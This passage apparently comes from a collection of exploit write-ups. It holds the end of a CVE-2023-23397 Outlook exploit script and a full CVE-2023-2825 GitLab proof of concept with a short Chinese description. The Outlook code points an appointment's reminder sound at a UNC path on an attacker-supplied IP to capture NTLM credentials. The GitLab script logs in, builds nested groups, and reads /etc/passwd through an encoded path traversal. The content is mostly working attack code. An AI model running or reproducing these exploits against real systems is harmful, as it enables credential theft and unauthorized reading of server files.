68 |     appt.ReminderOverrideDefault = True
69 |     appt.ReminderPlaySound = True
70 |     appt.ReminderSoundFile = "\\\\" + c2
71 |     if cmd == "save":
72 |         saveMail(appt)
73 |     elif cmd == "send":
74 |         sendMail(appt)
75 |     else:
76 |         print("[!] Unrecognized command, exiting...")
77 |         exit(1)
78 | 
79 | def main():
80 |     if len(sys.argv) != 4:
81 |         print("Usage: python Exploit.py <save_or_send> <target_email> <attacker_ip>")
82 |         sys.exit(0)
83 |     print('[*] CVE-2023-23397 v1.2 by Tiepolo G, Saleri M')
84 |     generateMail(sys.argv[1], sys.argv[2], sys.argv[3])
85 | 
86 | if __name__ == "__main__":
87 |     main()
88 | ```
89 | 


--------------------------------------------------------------------------------
/GitLab目录遍历漏洞.md:
--------------------------------------------------------------------------------
  1 | ## GitLab目录遍历漏洞
  2 |   当嵌套在至少五个组中的公共项目中存在附件时，未经身份验证的恶意用户可以利用路径遍历漏洞读取服务器上的任意文件
  3 |   
  4 | ### 影响范围
  5 | GitLab 社区版 (CE)   
  6 | 企业版 (EE) 版本 16.0.0
  7 | 
  8 | ```
  9 | # CVE-2023-2825 - GitLab Unauthenticated arbitrary file read
 10 | # Released by OccamSec on 2023.05.25
 11 | #
 12 | # OccamSec Blog: https://occamsec.com/exploit-for-cve-2023-2825/
 13 | # Vendor advisory: https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
 14 | #
 15 | # This Proof Of Concept leverages a path traversal vulnerability
 16 | # to retrieve the /etc/passwd file from a system running GitLab 16.0.0.
 17 | #
 18 | 
 19 | import requests
 20 | import random
 21 | import string
 22 | from urllib.parse import urlparse
 23 | from bs4 import BeautifulSoup
 24 | 
 25 | 
 26 | ENDPOINT = "https://gitlab.example.com"
 27 | USERNAME = "root"
 28 | PASSWORD = "toor"
 29 | 
 30 | # Session for cookies
 31 | session = requests.Session()
 32 | 
 33 | # CSRF token
 34 | csrf_token = ""
 35 | 
 36 | # Ignore invalid SSL
 37 | requests.urllib3.disable_warnings()
 38 | 
 39 | 
 40 | def request(method, path, data=None, files=None, headers=None):
 41 |     global csrf_token
 42 | 
 43 |     if method == "POST" and isinstance(data, dict):
 44 |         data["authenticity_token"] = csrf_token
 45 | 
 46 |     response = session.request(
 47 |         method,
 48 |         f"{ENDPOINT}{path}",
 49 |         data=data,
 50 |         files=files,
 51 |         headers=headers,
 52 |         verify=False,
 53 |     )
 54 |     if response.status_code != 200:
 55 |         print(response.text)
 56 |         print(f"[*] Request failed: {method} - {path} => {response.status_code}")
 57 |         exit(1)
 58 | 
 59 |     if response.headers["content-type"].startswith("text/html"):
 60 |         csrf_token = BeautifulSoup(response.text, "html.parser").find(
 61 |             "meta", {"name": "csrf-token"}
 62 |         )["content"]
 63 | 
 64 |     return response
 65 | 
 66 | 
 67 | # Get initial CSRF token
 68 | request("GET", "")
 69 | 
 70 | # Login
 71 | print("[*] Attempting to login...")
 72 | request(
 73 |     "POST",
 74 |     "/users/sign_in",
 75 |     data={"user[login]": USERNAME, "user[password]": PASSWORD},
 76 | )
 77 | 
 78 | print(f"[*] Login successful as user '{USERNAME}'")
 79 | 
 80 | 
 81 | # Create groups
 82 | group_prefix = "".join(random.choices(string.ascii_uppercase + string.digits, k=3))
 83 | print(f"[*] Creating 11 groups with prefix {group_prefix}")
 84 | 
 85 | parent_id = ""
 86 | for i in range(1, 12):
 87 |     # Create group
 88 |     name = f"{group_prefix}-{i}"
 89 |     create_resp = request(
 90 |         "POST",
 91 |         "/groups",
 92 |         data={
 93 |             "group[parent_id]": parent_id,
 94 |             "group[name]": name,
 95 |             "group[path]": name,
 96 |             "group[visibility_level]": 20,
 97 |             "user[role]": "software_developer",
 98 |             "group[jobs_to_be_done]": "",
 99 |         },
100 |     )
101 | 
102 |     # Get group id
103 |     parent_id = BeautifulSoup(create_resp.text, "html.parser").find(
104 |         "button", {"title": "Copy group ID"}
105 |     )["data-clipboard-text"]
106 | 
107 |     print(f"[*] Created group '{name}'")
108 | 
109 | # Create project
110 | project_resp = request(
111 |     "POST",
112 |     "/projects",
113 |     data={
114 |         "project[ci_cd_only]": "false",
115 |         "project[name]": "CVE-2023-2825",
116 |         "project[selected_namespace_id]": parent_id,
117 |         "project[namespace_id]": parent_id,
118 |         "project[path]": "CVE-2023-2825",
119 |         "project[visibility_level]": 20,
120 |         "project[initialize_with_readme": 1,
121 |     },
122 | )
123 | repo_path = urlparse(project_resp.url).path
124 | print(f"[*] Created public repo '{repo_path}'")
125 | 
126 | # Upload file
127 | file_resp = request(
128 |     "POST",
129 |     f"/{repo_path}/uploads",
130 |     files={"file": "hello world"},
131 |     headers={"X-CSRF-Token": csrf_token},
132 | )
133 | file_url = file_resp.json()["link"]["url"]
134 | print(f"[*] Uploaded file '{file_url}'")
135 | 
136 | # Get /etc/passwd
137 | exploit_path = f"/{repo_path}{file_url.split('file')[0]}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
138 | print(f"[*] Executing exploit, fetching file '/etc/passwd': GET - {exploit_path}")
139 | exploit_resp = request("GET", exploit_path)
140 | print(f"\n{exploit_resp.text}")
141 | 
142 | ```
143 | 


--------------------------------------------------------------------------------